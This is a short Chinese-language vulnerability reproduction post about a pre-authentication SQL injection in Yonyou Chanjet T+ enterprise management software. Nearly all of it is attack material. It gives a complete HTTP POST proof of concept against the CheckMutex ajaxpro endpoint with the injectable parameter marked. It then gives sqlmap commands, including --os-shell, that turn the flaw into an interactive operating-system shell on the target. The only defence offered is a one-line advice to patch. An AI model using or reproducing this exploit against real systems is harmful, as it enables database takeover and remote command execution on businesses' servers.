【漏洞复现】用友畅捷通T+ SQL注入漏洞
漏洞描述
用友畅捷通T+是一款企业管理软件,主要面向中小企业。它提供了包括财务、采购、销售、库存、生产制造、人力资源等在内的全面企业管理解决方案。通过用友畅捷通T+,企业可以实现对业务流程的数字化管理,提高工作效率,降低成本,增强企业竞争力。畅捷通T+存在前台SQL注入,导致命令执行。漏洞POC
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex HTTP/1.1Host: IP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
{"url":"11", "accNum":"1", "functionTag":"functionTag*"}
漏洞复现
用友畅捷通T+前台页面把漏洞POC复制保存为sqlmap-post.txt到sqlmap目录下,HOST修改为目标系统IP地址
sqlmap命令:sqlmap -r sqlmap-post.txt --is-dba
数据返回True,则表示是管理员权限运行(违反了最小权限原则)。
sqlmap命令:sqlmap -r sqlmap-post.txt --os-shell
利用已发现的SQL注入漏洞来获取目标服务器的操作系统Shell访问权限。它会在成功获取Shell后,提供一个交互式命令行界面,允许执行操作系统命令。
执行whoami返回用户信息
修复建议
目前官方已发布补丁更新,建议受影响用户尽快安装。
下一:没有了